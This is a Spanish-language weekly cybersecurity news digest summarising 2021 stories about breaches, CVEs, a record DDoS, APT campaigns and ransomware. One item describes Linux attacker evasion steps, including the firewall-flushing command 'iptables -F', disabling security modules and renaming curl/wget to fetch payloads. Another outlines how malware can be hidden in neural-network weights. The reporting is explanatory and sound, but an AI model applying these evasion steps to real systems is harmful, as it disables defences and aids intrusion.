Los ataques, detectados por la firma de seguridad Huntress Labs, se producen después de que el código de explotación de prueba de concepto se publicara en línea a principios de este mes y los análisis de sistemas vulnerables comenzaron la semana pasada.

FUENTE: https://thehackernews.com/2021/08/microsoft-exchange-under-attack-with.html

El mayor ataque DDoS registrado hasta la fecha.

Cloudflare informó esta semana que se ha enfrentado al mayor ataque de denegación de servicio distribuido (DDoS) jamás registrado.

Durante este ataque, Cloudflare afirma que recibió nada menos que 17,2 millones de peticiones HTTP por segundo (RPS). Para tener una perspectiva de cuán grande fue este ataque: Cloudflare atiende más de 25 millones de solicitudes HTTP por segundo en promedio. Esto se refiere a la tasa promedio de tráfico legítimo en el segundo trimestre de 2021. Por lo tanto, con un máximo de 17.2 millones de rps, este ataque alcanzó el 68% de nuestra tasa de rps promedio del segundo trimestre del tráfico HTTP legítimo.

Este ataque fue lanzado por una poderosa botnet, dirigida a un cliente de Cloudflare en la industria financiera. En cuestión de segundos, la botnet bombardeó el borde de Cloudflare con más de 330 millones de solicitudes de ataque. Sin embargo, la compañía está bastante satisfecha, ya que dice que fue capaz de mitigar este ataque masivo gracias a su protección DDoS de borde autónomo.

El tráfico de ataques se originó en más de 20.000 bots en 125 países de todo el mundo. Según las direcciones IP de origen de los bots, casi el 15% del ataque se originó en Indonesia y otro 17% en India y Brasil combinados. Indica que puede haber muchos dispositivos infectados con malware en esos países.

Cloudflare cree que la red de bots que causó esta inundación HTTP es la misma que provocó otro ataque DDoS la semana pasada. Sin embargo, ese ataque no fue tan potente como éste ya que se quedó en algo menos de 8 millones de peticiones por segundo.

Aunque no sabemos quién está detrás de los ataques, la empresa señala que se está produciendo un resurgimiento de los ataques de la red de bots Mirai que infecta a dispositivos IoT (como cámaras del hogar) y routers. Esta red es responsable de causar algunos de los mayores ataques DDoS de la historia.

Mirai se propaga infectando dispositivos operados por Linux, como cámaras de seguridad y routers. Luego, se autopropaga buscando los puertos Telnet abiertos 23 y 2323. Una vez encontrados, intenta obtener acceso a dispositivos vulnerables mediante la fuerza bruta de credenciales conocidas, como nombres de usuario y contraseñas predeterminados de fábrica. Las variantes posteriores de Mirai también aprovecharon las vulnerabilidades Zero-Day en routers y otros dispositivos. Una vez infectados, los dispositivos monitorearán un servidor de Command&Control (C2) para obtener instrucciones sobre qué objetivo atacar.

FUENTE: https://thehackernews.com/2021/08/cloudflare-mitigated-one-of-largest.html

Las Top 5 tendencias de Ciberseguridad dadas en el Black Hat 2021.

En la conferencia de seguridad Black Hat USA 2021 , las 5 principales tendencias observadas durante el evento según Oscar Sánchez y Oscar Aguilar, ambos de f5 son:

  • Ataques Ransomware
  • Protección al trabajo remoto
  • Seguridad en Cloud
  • Seguridad en DNS
  • Insider Threats and Data Breaches

En lo que podemos destacar:

Ransomware: El ransomware se ha convertido en el método mas utilizado por ciber-delincuentes para obtener ingresos, esto debido a que es difícil rastrear el pago que las empresa realizan.

“Hemos descubierto que antes de cifrar los datos, los atacantes obtienen y ex filtran datos sensibles, confidenciales y de algo valor para las empresas, con el objetivo de asegurar el pago del rescate, ya que la mayoría de las empresas que se han negado a pagar por el descifrador, han reportado que se pierde más tiempo, recursos humanos y tecnológicos en recuperarse, que si hubieran pagado y los datos cifrados hubieran sido descifrados.”

La Seguridad en el Trabajo Remoto: La protección de una fuerza de trabajo remota se ha convertido ahora en una de las principales prioridades de la empresa moderna, ya que las organizaciones de todos los tamaños tienen un mayor nivel de riesgo con el trabajo remoto. Se realizaron distintas sesiones para obtener información sobre las vulnerabilidades que ponen en riesgo a los empleados que trabajan desde casa. Según los hallazgos recientes de Gartner, “la cantidad de incidentes internos ha aumentado en un 47% en solo dos años, y los empleados tienen un 85% más de probabilidades de filtrar archivos ahora que antes de la pandemia”.

Seguridad en la Nube: Con la transformación digital avanzando rápidamente en gran medida por la adopción y crecimiento cada vez más de las aplicaciones desplegadas en las distintas nubes públicas y/o privadas, las organizaciones deben mantenerse resilientes, ya que los actores maliciosos aprovechan la expansión significativa de la superficie de ataque y continúan infiltrándose en las aplicaciones no solo tradicionales sino también en aplicaciones modernas.

FUENTE: https://www.linkedin.com/pulse/las-top-5-tendencias-de-ciberseguridad-dentro-black-hat-oscar-aguilar/?utm_medium=employee-social&utm_source=everyonesocial&utm_campaign=latam_mx-as_as

Esta semana en ciberseguridad – Agosto, Semana 3

Microsoft publica los parches de seguridad de Agosto

Microsoft ha publicado, como es habitual, el parche de este mes de agosto en el que se solucionan al menos 44 vulnerabilidades, entre las que se encuentran algunas clasificadas como críticas.

Entre los productos afectados se encuentran .NET Core, Visual Studio, Windows Update, Windows Print Spooler, Windows Media, Windows Defender, Remote Desktop Client, Microsoft Edge, Microsoft Office y algunos más.

Entre las vulnerabilidades corregidas más destacadas se encuentra la relacionada con Windows Print Spooler, la famosa vulnerabilidad #PrintNightmare, una vulnerabilidad relacionada con la herramienta Windows Remote Desktop (CVE-2021-34535), la cual está clasificada con una puntuación de 8.8 y se desconocen sus detalles. Y otra vulnerabilidad (CVE-2021-26424) clasificada con una puntuación de 9.9 sobre 10, estando ésta presente en Windows 7 hasta Windows 10, y Windows Server 2008 hasta 2019

En resumen, 13 de las vulnerabilidades parcheadas son de ejecución de código remoto, y otras 8 están relacionadas con revelación de información. Los 3 zero-days más críticos son los relacionados con el servicio de Print Spooler y Remote Desktop.

Se recomienda a todos los administradores de sistemas y usuarios que apliquen estos parches de seguridad cuanto antes para evitar posibles ataques que aprovechen estas vulnerabilidades.

FUENTE: https://unaaldia.hispasec.com/2021/08/microsoft-publica-el-parche-de-seguridad-de-agosto.html

Roban más de 600 millones en criptomonedas de la plataforma Poly Network

Unos hackers han conseguido desviar unos 611 millones de dolares en diferentes criptomonedas de una red financiera basada en Blockchain, aprovechándose de vulnerabilidades en su código.

El pasado 10 de agosto, Poly Network anunció que su plataforma había sido comprometida, y que parte de sus activos habían sido transferidos a una serie de direcciones controladas por el atacante.

Poly Network es una plataforma descentralizada para el intercambio de tokens o cryptomonedas entre diferentes blockchains, como pueden ser Ethereum, Binance Smart Chain, Polygon, etc. Mediante una red de blockchains propia y smart contracts desplegados en las redes participantes, permite la transferencia segura de activos entre las mismas.

Se dice que los activos robados de Binance Chain, Ethereum y Polygon se transfirieron a tres billeteras (wallets) diferentes, y la compañía instó a los mineros de la cadena de blockchain y a los servicios de intercambios (centralized crypto exchanges) bloquear las transacciones provenientes de estas wallets. Las tres direcciones de billetera son las siguientes:

  • Ethereum: $273 million
  • Binance Smart Chain: $253 million
  • Polygon: $85 million

FUENTE: https://thehackernews.com/2021/08/hacker-steal-over-600-million-worth-of.html

GitHub bloquea el uso de contraseñas para operaciones en GIT

GitHub ha anunciado que ya no se aceptarán contraseñas de las cuentas para autenticar las operaciones de GIT a partir del 13 de Agosto de 2021.

Este cambio ya se había anunciado por primera vez el año pasado, en julio, cuando GitHub dijo que las operaciones de Git autenticadas requerirían el uso de una clave SSH o autenticación basada en token.

GitHub también desautorizó la autenticación basada en contraseña para la autenticación a través de la API REST a partir del 13 de noviembre de 2020.

Ahora se requerirá la autenticación basada en token (por ejemplo, acceso personal, OAuth, clave SSH o token de instalación de la aplicación GitHub) para todas las operaciones de GIT.

FUENTE: https://www.bleepingcomputer.com/news/security/github-deprecates-account-passwords-for-authenticating-git-operations/

WEBINAR AXONIUS

Resumen del Webinar

En este webinar vimos como Axonius nos puede ayudar, sin la necesidad de instalar agentes, a entender la importancia de gestionar tus activos con certeza, y responde algunas preguntas esenciales, tales como:

  • Cobertura del agente: ¿está mi agente donde debe estar y esta correctamente instalado?
  • Cobertura en la nube: ¿mi herramienta de evaluación de vulnerabilidades analiza todas mis instancias incluyendo mi infraestructura en la nube?
  • Dispositivos no administrados conectados a nuestra red: ¿hay dispositivos no administrados conectados en mi red?

Axonius utiliza la integración con más de 320 plataformas para hacer consultas cruzadas y verificar brechas de cobertura.

Temas abordados:

  • ¿Cómo descubrir brechas de cobertura?
  • Diferentes casos de uso y consultas sobre tu infraestructura.
  • Validar y hacer cumplir tus políticas de ciberseguridad.

Demo Axonius

Agradecimientos a @MarceloDiaz, Axonius: @NathanMcGavin, @MichelleEllis, @OCChacon.

Esta semana en ciberseguridad – Agosto, Semana 2

Vulnerabilidad grave en millones de routers (AR y MX incluidos) – CVE-2021-20090

Un grave fallo de seguridad pone en riesgo a millones de routers en todo el mundo, incluidos algunos modelos distribuidos en Argentina y México. Se trata de una vulnerabilidad crítica que evita la autenticación y afecta a dispositivos domésticos que utilizan el firmware Arcadyan. Esto permite a un atacante controlarlos y llevar a cabo ataques mediante la botnet Mirai. Este problema afecta a muchos modelos y operadoras de telefonía.

Este fallo de seguridad ha sido registrado como CVE-2021-20090 y calificado con 9,9 puntos sobre 10 por su gravedad. Estos ataques fueron descubiertos por investigadores de seguridad de Juniper Threat Labs. El problema, que afecta al firmware de los dispositivos, puede ser explotado de forma remota.

Hay que indicar que afecta a una gran cantidad de modelos. De hecho, se calcula que pueden ser millones los routers afectados en todo el mundo. Afecta a múltiples proveedores internacionales como son British Telecom, Deutsche Telecom, Orange, O2 (Telefónica) o Vodafone. Afecta tanto a modelos de ADSL como de fibra.

Desde Tenable (ver fuente) publicaron una lista con todos los modelos y proveedores afectados. Además, la semana pasada lanzaron una prueba de concepto para explotar el error. Se trata de una vulnerabilidad que ha existido al menos durante 10 años y, apenas un par de días después de lanzar la prueba de concepto, han detectado ataques.

El problema principal, es que existen muchos routers desactualizados, lo que es un problema importante, ya que esta vulnerabilidad no será corregida y los atacantes van a tener una gran cantidad de routers susceptibles de ser explotados.

Para solucionar este problema, los usuarios deben actualizar lo antes posible sus routers. Desde Juniper Threat Labs (ver fuentes -2-) han emitido un documento informativo donde explican detalladamente cómo funciona este ataque y de qué manera podrían aprovecharse de los modelos afectados.

Esta vulnerabilidad también afecta a dispositivos IoT que utilizan el mismo código base. Esto hace que muchos equipos domésticos, como pueden ser televisiones, bombillas inteligentes y otros muchos de lo que se conoce como el Internet de las Cosas puedan ser vulnerables.

Nuestro consejo, es mantener todo correctamente actualizado. Actualizar el firmware del router y de cualquier otro equipo que tengamos conectado a la red es vital. Esto nos permite corregir vulnerabilidades cómo esta que mencionamos y que pueden ser la vía de entrada de los hacker informáticos.

FUENTE:
(1) https://es-la.tenable.com/security/research/tra-2021-13?tns_redirect=true
(2) https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wilUd

Un error crítico en equipos CISCO, permite tomar el control Remoto de estos.

Los investigadores de seguridad advirtieron que al menos 8.800 sistemas vulnerables están expuestos a ser comprometidos

Una vulnerabilidad de seguridad crítica en un subconjunto de los enrutadores VPN para pequeñas empresas de Cisco Systems podría permitir que un atacante remoto no autenticado se apodere de un dispositivo, y los investigadores dijeron que hay al menos 8.800 sistemas vulnerables abiertos al peligro.

Cisco abordó los errores (CVE-2021-1609) como parte de una gran cantidad de parches implementados esta semana. En total, las soluciones y los productos afectados son los siguientes:

  • Cisco RV340, RV340W, RV345 y RV345P Dual WAN Gigabit VPN Routers Vulnerabilidades de administración web (advertencia)
  • Vulnerabilidad de ejecución remota de comandos de los routers VPN de las series RV160 y RV260 de Cisco Small Business (advertencia)
  • Vulnerabilidad de inyección de DLL de Cisco Packet Tracer para Windows (advertencia)
  • Vulnerabilidad de escalamiento de privilegios del servidor Secure Shell de Cisco Network Services Orchestrator CLI (advertencia)
  • ConfD CLI Secure Shell Server Privilege Escalation Vulnerability (advertencia)

Esta vulnerabilidad ha sido clasificada con un 9.8 según la CVSS sobre 10 y podría permitir a un atacante remoto no autenticado ejecutar código arbitrario o causar una condición de denegación de servicio (DoS) a través del envío de peticiones HTTP. Dicha interfaz de administración web es accesible localmente de manera predeterminada y no se puede deshabilitar, aunque el acceso remoto debe ser configurado por el usuario, se encuentra desactivada por defecto.

FUENTE:
(1) https://unaaldia.hispasec.com/2021/08/graves-vulnerabilidades-en-productos-cisco.html
(2) https://threatpost.com/critical-cisco-bug-vpn-routers/168449/

Apple reaviva debate sobre privacidad de datos

En su lucha contra la explotación sexual de menores la empresa Apple volvió a poner sobre la mesa el debate en torno a la privacidad de datos. Luego de que la empresa revelara cuáles son las herramientas que utilizará para detectar con mayor eficacia las imágenes sexuales que involucran a menores de edad, se reavivó el debate sobre el cifrado de datos y la privacidad de los usuarios ya que hay quienes temen que estas nuevas tecnologías puedan ser utilizadas para espionaje por parte de los gobiernos.

En ese sentido, según el fabricante de iPhone, iPad e iMac, la iniciativa tiene como objetivo proteger a los más jóvenes de los depredadores que operan en Internet.

Sin embargo, este anuncio supone para el empresa un punto de inflexión muy importante: hasta ahora Apple se resistía a cualquier esfuerzo que debilitara su sistema de encriptado, que previene que terceras partes accedan a datos privados de los usuarios de los productos de la manzanita.

En ese contexto, Apple difundió una nota técnica en la que aseguró que una de sus herramientas fue desarrollada por expertos en criptografía, y que además de ser “segura”, “fue diseñada expresamente para preservar la privacidad del usuario”.

Esa herramienta es la que comparará las fotos cargadas en iCloud con las almacenadas en un archivo administrado por el Centro Nacional para Niños Desaparecidos y Explotados de Estados Unidos (US National Center for Missing and Exploited Children o NCMEC), una corporación privada estadounidense que combate la explotación sexual infantil. Apple asegura que no tiene acceso directo a esas imágenes.

“Este tipo de herramienta puede ser muy útil para encontrar pornografía infantil en los teléfonos de las personas, pero imagínense lo que podría hacer en manos de un gobierno autoritario”.

tuiteó Matthew Green, criptógrafo de la Universidad Johns Hopkins.

Según denunció Blaze, Apple no solo escaneará los datos alojados en sus servidores sino también los almacenados en el propio teléfono, por lo tanto, “tendrá potencialmente acceso a todos nuestros datos”.

Anteriormente, Apple se había negado categóricamente a ayudar a la policía a acceder al contenido encriptado del teléfono celular de uno de los perpetradores de un ataque en el que murieron 14 personas, en 2015 en California. A raíz de este tipo de hechos, para el FBI, que los mensajes estén encriptados de un extremo a otro y solo puedan ser leídos por remitentes y destinatarios protege a delincuentes y terroristas.

Quien criticó la nueva política de Apple fue Will Cathcart, director de la aplicación de mensajería WhatsApp que es propiedad de Facebook. Según el ejecutivo, el enfoque de la empresa de tecnología es “malo y un revés para la privacidad de las personas en todo el mundo” ya que este sistema “no es confidencial porque puede escanear todas las fotos privadas en un teléfono”.

FUENTE: https://www.bbc.com/mundo/noticias-58115848

Esta semana en ciberseguridad – Agosto, Semana 1

Investigadores logran ocultar malware en una red neuronal

Una prueba de concepto muestra cómo unos investigadores han logrado insertar malware en los nodos de una red neuronal sin afectar al rendimiento del modelo.
Un estudio presentado por los investigadores Zhi Wang, Chaoge Liu, y Xiang Cui han mostrado cómo esta técnica permite incluir malware en una arquitectura como AlexNet. Dicha arquitectura, una red neuronal convolucional (CNN), se compone de millones de parámetros y múltiples capas de neuronas, incluyendo capas «ocultas» totalmente conectadas. El estudio concluye que modificar algunas neuronas no tiene un gran impacto en la precisión del modelo.
Utilizando muestras reales de malware, las pruebas afirman que un modelo de AlexNet con normalización por lotes o «batch normalization» puede incluir hasta 36.9MB de malware en un fichero de modelo de 178MB, perdiendo menos del 1% de la precisión del modelo, pasando inadvertido por el usuario que lo implemente. Esto hace además que sea indetectable por motores de antivirus, aunque esto se debe también al factor de que no hay analistas que hayan desarrollado un framework de detección para este tipo de modelos.

Añadiendo el malware a la red neuronal
El algoritmo desarrollado por los investigadores para incrustar el malware se basa en leer 3 bytes del mismo cada vez y convertirlos en números flotantes válidos con formato big-endian tras añadir los prefijos adecuados a los bytes. Estos números se convierten en tensores antes de ser incrustados en el modelo. Dado un modelo de red neuronal y una capa, se modifican las neuronas secuencialmente reemplazando los pesos o «weights» y el sesgo o «bias» en cada una. Se utilizan los pesos de cada neurona para almacenar los bytes de malware convertidos y el sesgo para almacenar la longitud y el hash del malware.

En el proceso inverso, para verificar la integridad del malware, el receptor necesita extraer los parámetros de la neurona en cada capa, convertir los parámetros a números flotantes, luego a bytes en formato big-endian y eliminar los prefijos de los bytes para obtener el flujo de bytes binario. Con la longitud almacenada en el «bias» de la primera neurona se puede ensamblar de nuevo el malware. Este proceso de extracción se puede verificar comparando el hash del malware con el hash almacenado en el «bias».

Escenarios de ataque
La presentación de esta técnica no supone un gran riesgo actualmente, dado que se trata más de un ejercicio de esteganografía que de un escenario real que puedan aprovechar los actores maliciosos. En el momento en el que el malware es ensamblado y ejecutado puede seguir siendo detectado mediante técnicas tradicionales como el análisis estático o dinámico. No obstante, hay que considerar que las redes neuronales también pueden llegar a ser maliciosas. Probablemente en un futuro, con la adopción generalizada de modelos de «machine learning» en el desarrollo de aplicaciones, aparezcan nuevos vectores de ataque que empleen este tipo de técnicas.

FUENTES: (1) https://unaaldia.hispasec.com/2021/07/investigadores-logran-ocultar-malware-en-una-red-neuronal.html (2) https://arxiv.org/pdf/2107.08590.pdf

El nuevo grupo de piratería APT pone foco en servidores Microsoft IIS con exploits ASP.NET

Un nuevo actor altamente capaz en el mundo de las amenazas persistentes a tomado como foco a las principales entidades públicas y privadas de alto perfil en los EE. UU. como parte de una serie de ataques de intrusión dirigidos mediante la explotación de Internet frente a los servidores de Microsoft Internet Information Services (IIS) para infiltrarse en sus redes.

La firma israelí de ciberseguridad Sygnia, que identificó la campaña, está rastreando al avanzado y sigiloso adversario bajo el sobrenombre de “Praying Mantis” o “TG2021“.

“TG2021 utiliza un framework de malware personalizado, construido alrededor de un núcleo común, hecho a medida para los servidores IIS. El conjunto de herramientas es completamente volátil, se carga de manera reflectante en la memoria de una máquina afectada y deja poco o ningún rastro en los objetivos infectados”

“TG2021 también utiliza “stealthy backdoor” adicional y varios módulos posteriores a la explotación para realizar el reconocimiento de la red, elevar los privilegios y moverse lateralmente dentro de las redes”

Los Investigadores de la firma Israelí

Además de exhibir capacidades que muestran un esfuerzo significativo para evitar la detección interfiriendo activamente con los mecanismos de registro y evadiendo con éxito los sistemas comerciales de detección y respuesta de puntos finales (EDR), se sabe que TG2021 aprovecha un arsenal de exploits de aplicaciones web ASP.NET para obtener una ventaja, punto de apoyo inicial y puerta trasera de los servidores mediante la ejecución de un implante sofisticado llamado “NodeIISWeb” que está diseñado para cargar archivos DLL personalizados, así como para interceptar y manejar las solicitudes HTTP recibidas por el servidor.
Las vulnerabilidades que aprovecha el actor incluyen:

  • Checkbox Survey RCE Exploit (CVE-2021-27852)
  • VIEWSTATE Deserialization Exploit
  • Altserialization Insecure Deserialization
  • Telerik-UI Exploit (CVE-2019-18935 y CVE-2017-11317)

Curiosamente, la investigación de Sygnia sobre Las tácticas, técnicas y procedimientos (TTP) de TG2021 han descubierto “superposiciones importantes” con una táctica llamada “Compromisos de copiar y pegar”, como se detalla en un aviso publicado por el Centro Australiano de Seguridad Cibernética (ACSC) en junio de 2020., dirigida a la infraestructura de cara al público, principalmente a través del uso de fallas en la interfaz de usuario de Telerik que no estaban parchados.y los servidores IIS. Sin embargo, aún no se ha realizado una atribución formal.

“Praying Mantis, es un ejemplo de una tendencia creciente de ciberdelincuentes que utilizan métodos de ataque sofisticados de estado-nación para atacar organizaciones comerciales”

Los Investigadores de Sygnia

Las actividades forenses continuas y la respuesta oportuna a incidentes son esenciales para identificar y defender eficazmente de los ataques de este tipos de actores.

FUENTES: https://thehackernews.com/2021/08/new-apt-hacking-group-targets-microsoft.html

Seis Scrips maliciosos del Shell de Linux usados para eludir defensas y como pararlos.

Uptycs Threat Research describe cómo se utilizan los scripts maliciosos del shell de Linux para ocultar los ataques y cómo los defensores pueden detectarlos y mitigarlos.

Las técnicas de evasión utilizadas por los atacantes son antiguas, cuando se usaba base64 y otros esquemas de codificación comunes. Hoy en día, los atacantes están adoptando nuevas tácticas y técnicas de scripting de shell de Linux para deshabilitar firewalls, monitorear agentes y modificar listas de control de acceso (ACL).

En este articulo se cubrirán técnicas de scripting de shell evasivas comunes como:

  • Desinstalación de agentes de monitoreo
  • Deshabilitación de cortafuegos e interrupciones
  • Deshabilitación de módulos de seguridad de Linux (LSM)
  • Modificación de ACL
  • Cambio de atributos
  • Cambio de nombres de utilidades comunes.

Técnica 1: Desinstalación de agentes de monitoreo
Los agentes de monitoreo son los componentes de software que monitorean regularmente las actividades que ocurren en el sistema relacionadas con el proceso y la red. Los agentes de monitoreo también crean varios registros, lo que ayuda durante la investigación de cualquier incidente.

El script malicioso encontrado intenta:

  • Desinstalar el agente de monitoreo relacionado con la nube Aegis (agente de detección de amenazas de Alibaba Cloud), deteniendo el servicio Aliyun.
  • Desinstale Yunjeng, que es el agente de seguridad de host de Tencent
  • Desinstale el agente de administración de clientes de BCM, que generalmente se instala en los endpoint para mitigar los resgos

Técnica 2: Desactivación de cortafuegos e interrupciones
La mayoría de los sistemas y servidores implementan cortafuegos como mecanismo de defensa En el script malicioso, los atacantes intentan desactivar el cortafuegos, es decir, cortafuegos ininterrumpido (ufw) como táctica de evasión de defensa, Junto con eso, los atacantes también eliminan las reglas de iptables (iptables -F) porque se usa ampliamente para administrar las reglas de firewall en sistemas y servidores Linux.

Técnica 3: Deshabilitar los módulos de seguridad de Linux (LSM)
El script malicioso también deshabilita los módulos de seguridad de Linux como SElinux, Apparmor. Estos módulos están diseñados para implementar políticas de control de acceso obligatorio (MAC). Un administrador de servidor podría simplemente configurar estos módulos para proporcionar a los usuarios acceso restringido a las aplicaciones instaladas o en ejecución en el sistema.

AppArmour es una función de seguridad en Linux que se utiliza para bloquear aplicaciones como Firefox para aumentar la seguridad. Un usuario puede restringir una aplicación en la configuración predeterminada de Ubuntu otorgando un permiso limitado a una determinada aplicación.

SElinux es otra característica de seguridad en los sistemas Linux mediante la cual un administrador de seguridad podría aplicar el contexto de seguridad en ciertas aplicaciones y utilidades. En algunos servidores web, el shell está deshabilitado o restringido, por lo que los adversarios de RCE (ejecución remota de código) generalmente evitan / deshabilitan esto:

Técnica 4: Modificación de ACL
ACL, o listas de control de acceso, contienen las reglas por las cuales los permisos sobre archivos y utilidades. Las ACL del sistema de archivos le dicen a los sistemas operativos qué usuarios pueden acceder al sistema y qué privilegios tienen los usuarios. La utilidad Setfacl en Linux se usa para modificar, eliminar la ACL, en el script podemos ver el uso de setfacl que establece los permisos de chmod para el usuario:

Técnica 5: Cambiando Atributos
Chattr en Linux se usa para configurar / desarmar ciertos atributos de un archivo. Los adversarios usan esto para sus propios archivos o para hacer que un usuario no pueda eliminarlos.

Técnica 6: Cambiar el nombre de las utilidades comunes
Una de los scripts maliciosos contenían utilidades comunes como wget, curl usado con diferentes nombres. Estas utilidades se utilizan generalmente para descargar archivos desde la IP remota. Los atacantes usan estas utilidades para descargar archivos maliciosos de C2. Algunas de las soluciones de seguridad cuyas reglas de detección monitorean los nombres exactos de las utilidades podrían no activar el evento de descarga si wget, curl se usan con nombres diferentes.

FUENTES: https://threatpost.com/six-malicious-linux-shell-scripts-how-to-stop-them/168127/

Esta semana en ciberseguridad – Julio, Semana 4

Cómo mitigar la vulnerabilidad SeriousSAM de Microsoft Windows 10, 11

Microsoft Windows 10 y Windows 11 corren el riesgo de sufrir una nueva vulnerabilidad sin parchear que se reveló públicamente recientemente.

Como informamos la semana pasada, la vulnerabilidad, SeriousSAM, permite a los atacantes con permisos de bajo nivel acceder a los archivos del sistema de Windows para realizar un ataque Pass-the-Hash (y potencialmente Silver Ticket).

Los atacantes pueden aprovechar esta vulnerabilidad para obtener contraseñas hash almacenadas en el Administrador de cuentas de seguridad (SAM) y en el Registro y, en última instancia, ejecutar código arbitrario con privilegios de SISTEMA.

La vulnerabilidad SeriousSAM, rastreada como CVE-2021-36934, existe en la configuración predeterminada de Windows 10 y Windows 11, específicamente debido a una configuración que permite permisos de ‘lectura’ para el grupo de usuarios integrado que contiene a todos los usuarios locales.

Como resultado, los usuarios locales integrados tienen acceso para leer los archivos SAM y el Registro, donde también pueden ver los hash. Una vez que el atacante tiene acceso de ‘Usuario’, puede usar una herramienta como Mimikatz para obtener acceso al Registro o SAM, robar los hashes y convertirlos en contraseñas. Invadir a los usuarios del dominio de esa manera les dará a los atacantes privilegios elevados en la red.

Debido a que todavía no hay un parche oficial disponible de Microsoft, la mejor manera de proteger su entorno de la vulnerabilidad de SeriousSAM es implementar medidas de refuerzo.

Mitigación de SeriousSAM

Según Dvir Goren, CTO de CalCom, hay tres medidas de refuerzo opcionales:

  • Elimine a todos los usuarios del grupo de usuarios integrado: este es un buen lugar para comenzar, pero no lo protegerá si se roban las credenciales de administrador. .
  • Restrinja los archivos SAM y los permisos de registro: permita el acceso solo a los administradores. Esto, nuevamente, solo resolverá una parte del problema, ya que si un atacante roba las credenciales de administrador, usted seguirá siendo vulnerable a esta vulnerabilidad.
  • No permita el almacenamiento de contraseñas y credenciales para la autenticación de red; esta regla también se recomienda en los puntos de referencia de CIS. Al implementar esta regla, no habrá hash almacenado en el SAM o en el registro, mitigando así esta vulnerabilidad por completo.

FUENTE: https://thehackernews.com/2021/07/how-to-mitigate-microsoft-windows-10-11.html

TOP 25 CWE 2021: Las debilidades de Software más peligrosas

Las 25 debilidades de software más peligrosas (MITRE CWE Top 25) es una lista demostrativa de los problemas más comunes e impactantes experimentados durante los dos años calendario anteriores. Estas debilidades son peligrosas porque a menudo son fáciles de encontrar, explotar y pueden permitir que los adversarios se apoderen completamente de un sistema, roben datos o impidan que una aplicación funcione.

El CWE Top 25 es un valioso recurso de la comunidad que puede ayudar a los desarrolladores, evaluadores y usuarios, así como a los gerentes de proyectos, investigadores de seguridad y educadores, a proporcionar información sobre las debilidades de seguridad más graves y actuales.

FUENTE: https://cwe.mitre.org/top25/archive/2021/2021_cwe_top25.html

El verdadero impacto de los ataques de ransomware

La investigación de Keeper revela que, además de desconectar los sistemas, los ataques de ransomware degradan la productividad, hacen que las organizaciones incurran en costos indirectos significativos y dañan su reputación.

Uno de los mitos más dañinos sobre los ataques de ransomware es: “Si su empresa realiza copias de seguridad del sistema con regularidad, no tiene que preocuparse. Simplemente restaure desde la copia de seguridad “. Si bien las copias de seguridad del sistema son cruciales: los cortes de energía, los desastres naturales o incluso los errores de los empleados pueden destruir los datos tan rápido como un ciberataque, no son una solución milagrosa. Recuperarse de un ataque de ransomware implica más que restaurar sistemas y datos.

¿Cómo es realmente la recuperación de ransomware? Para averiguarlo, Keeper Security encuestó a 2.000 empleados en los EE. UU. Cuyas organizaciones habían sido víctimas de ransomware en los últimos 12 meses. Esto es lo que encontraron.

Casi un tercio de las empresas “fueron atropelladas por trenes que nunca vieron venir”.
Durante el año pasado, los ataques de ransomware se han ganado un lugar casi permanente en la portada de todos los periódicos del país. Sin embargo, el 29% de los que respondieron a la encuesta de Keeper no tenían idea de qué era el ransomware hasta que sus organizaciones se vieron afectadas.

Esto indica que muchos empleadores no brindan a sus trabajadores una formación adecuada en ciberseguridad. Eso es especialmente preocupante porque la mayoría de los ataques involucraron esquemas de ingeniería social, incluidos correos electrónicos de phishing (42%), sitios web maliciosos (23%) y contraseñas comprometidas (21%).

La recuperación de ransomware no es indolora. Provoca cambios, muchos de ellos bastante disruptivos.
Restaurar datos y sistemas desde la copia de seguridad es solo el comienzo de la recuperación de ransomware. Las organizaciones necesitan fortalecer los sistemas para prevenir futuros ataques, así como reparar los sistemas dañados por el ransomware. El 83% de los encuestados informó que sus empleadores habían instalado un nuevo software o habían realizado otros cambios significativos.

Cualquier cambio en el entorno de datos de una organización tiene el potencial de degradar la productividad, especialmente si se trata de un cambio importante como la migración a la nube. Eso es ciertamente lo que dijeron los encuestados.

FUENTE: https://threatpost.com/true-impact-of-ransomware-attacks/168029/